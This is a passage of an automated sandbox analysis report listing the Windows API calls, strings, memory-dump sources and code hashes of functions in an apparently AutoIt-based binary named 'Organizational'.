                                                            • Part of subcall function 002C86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002C849D,?,00000000,?,?), ref: 002C86F7
                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 002C84DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 2496851823-2422070025
                                                          • Opcode ID: 9385dd7f8b1c489bc5581a017076ebeec1f2c9238deabe9df005f49f2d94d6dd
                                                          • Instruction ID: 389e1dc85bc116c21ae8e6093e3a08e5352285bfd84387041c011bcb7dd45cb2
                                                          • Opcode Fuzzy Hash: 9385dd7f8b1c489bc5581a017076ebeec1f2c9238deabe9df005f49f2d94d6dd
                                                          • Instruction Fuzzy Hash: E4110835110206ABCB24EF64DC86FAEF364FF00310F10861EFA155B2C1DB71A861CB55
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A9A2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 15a85cf7cc629100ac384136bcf2bec63d8586b77101cf2296746b12a18a22b2
                                                          • Instruction ID: 23a230352266a41e38d6f75a3ec2289d90a5bdaac6821f4a15ed531143a2682a
                                                          • Opcode Fuzzy Hash: 15a85cf7cc629100ac384136bcf2bec63d8586b77101cf2296746b12a18a22b2
                                                          • Instruction Fuzzy Hash: 3401F571A62254ABCB14EFA4CC51DFEB369AF57320B14060AF861973C2DE305868CA60
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0025BC07
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _wcscat.LIBCMT ref: 00293593
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: s1
                                                          • API String ID: 257928180-2986196627
                                                          • Opcode ID: 27b6099ced9b4980603aafb29ee4adea061cf9541a50df04c397ee20b7de1abf
                                                          • Instruction ID: aa6580ff29728ce985c8cdc6e97b3730a3133539b1f093e158d14337ff7f30b9
                                                          • Opcode Fuzzy Hash: 27b6099ced9b4980603aafb29ee4adea061cf9541a50df04c397ee20b7de1abf
                                                          • Instruction Fuzzy Hash: 1D1186349242089B8B06EFB49881DCD77B8FF0C352B1044A6BD4597190EF709BE85F95
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 08d99bc37a4ade147ced7b6aab81231edfb8ee3830a1ded4a14b0a6fb404f8e8
                                                          • Instruction ID: 8a133b4a59b298064ad25bf8a2ea1bb0dc4d6e5b7a0cc675216721f431df4456
                                                          • Opcode Fuzzy Hash: 08d99bc37a4ade147ced7b6aab81231edfb8ee3830a1ded4a14b0a6fb404f8e8
                                                          • Instruction Fuzzy Hash: A301F9728142587EDB18CBA8CC56EFEBBF89F01301F00429AF556D2181E5B5A6148B60
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 002A9923
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: aa68623a119fa960f7ee22625d58dabb59920329a4947197864e28311aa85b08
                                                          • Instruction ID: 5859529ea25209cfa756def0eebc560a534be20061e4a4a5a5708aa40e9bf6c8
                                                          • Opcode Fuzzy Hash: aa68623a119fa960f7ee22625d58dabb59920329a4947197864e28311aa85b08
                                                          • Instruction Fuzzy Hash: 6101A772A621057BCB15EBA0DD62EFFB3AC9F16340F140119B851A32C1DE505E78DAB1
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 002A99A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: dab4e8c72b224075d798458c98f23fa299c07c7f63b1870c22b24493590c2c82
                                                          • Instruction ID: 4895aa25bbd54262887931177294b69ea4d81fe8bdad0116bbd32580a3768c87
                                                          • Opcode Fuzzy Hash: dab4e8c72b224075d798458c98f23fa299c07c7f63b1870c22b24493590c2c82
                                                          • Instruction Fuzzy Hash: 6101DB72A6210577CB11EBA4CD52EFFB3AC9F16340F140019B845A3281DE655E78DA72
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: @b1
                                                          • API String ID: 3494438863-2312003021
                                                          • Opcode ID: 92c968447b2c6257fef2fcaac5ea53960ecf693b6d7801840efeef0274814ee0
                                                          • Instruction ID: 40726d62ab911f7cff03cfd0c7533ed5f36315e83c028a6fcb4df8694e80d09f
                                                          • Opcode Fuzzy Hash: 92c968447b2c6257fef2fcaac5ea53960ecf693b6d7801840efeef0274814ee0
                                                          • Instruction Fuzzy Hash: CAF04F71378A138BEB398F58BC156E167A9E70C720F14D86AF109DA294E77488934A90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 4105c22fd113f0b2550e1432e02c96288c429464ec8c0287be539e18f762c766
                                                          • Instruction ID: fc64ffe9a35fd9f5cf11b38e4e5fe17d16d4314e577f2b0a7842d1dd593c6fc7
                                                          • Opcode Fuzzy Hash: 4105c22fd113f0b2550e1432e02c96288c429464ec8c0287be539e18f762c766
                                                          • Instruction Fuzzy Hash: A1E0D17254022917D720DB59AC49FD7FBACDB55771F000057FD44D7051D570D95587D0
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002A88A0
                                                            • Part of subcall function 00273588: _doexit.LIBCMT ref: 00273592
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: 2679ce2fe3b87c777b1755b39e61d9a8ec69cf94faf6c9f88007ce5aa43b3f8d
                                                          • Instruction ID: e895b6539c2fcebe47f91702c42cdcfceb90069200b6278cbc281383e9adcc08
                                                          • Opcode Fuzzy Hash: 2679ce2fe3b87c777b1755b39e61d9a8ec69cf94faf6c9f88007ce5aa43b3f8d
                                                          • Instruction Fuzzy Hash: 4BD02B313E135832C21132A87C1BFCA3B4C8F06B50F404026FB0C651C34DE685F046E5
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00290091
                                                            • Part of subcall function 002CC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0029027A,?), ref: 002CC6E7
                                                            • Part of subcall function 002CC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC6F9
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00290289
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 582185067-3257408948
                                                          • Opcode ID: bc36bd45305b9a9752bf3011382f7ff5f2e0534f12447b069cf6af407011bccd
                                                          • Instruction ID: e8cbd578d5d3df62b948a2ef3530b0c5756fc6bdc19999011c31e84d65388420
                                                          • Opcode Fuzzy Hash: bc36bd45305b9a9752bf3011382f7ff5f2e0534f12447b069cf6af407011bccd
                                                          • Instruction Fuzzy Hash: F3F0157086410ADFCB15DBA1D9C8BECBAB8AB08300F240085E106A6090CBB14E95CF20
                                                          APIs
                                                          • DestroyIcon.USER32(,z10z1,00317A2C,00317890,?,00265A53,00317A2C,00317A30,?,00000004), ref: 00265823
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: DestroyIcon
                                                          • String ID: ,z10z1$SZ&,z10z1
                                                          • API String ID: 1234817797-1708137086
                                                          • Opcode ID: 41092f0df1efcf72107529943297ce587f310963ec66d19c59a453a896b26b66
                                                          • Instruction ID: cba2c1091ad469f0c9e68d0ccb1e619df05c66561669488c296e26ff1c8b7b79
                                                          • Opcode Fuzzy Hash: 41092f0df1efcf72107529943297ce587f310963ec66d19c59a453a896b26b66
                                                          • Instruction Fuzzy Hash: 59E0173242426BEBEB311F49E804B95FBE8AF65321F648426E4845B561D3F568F0CB94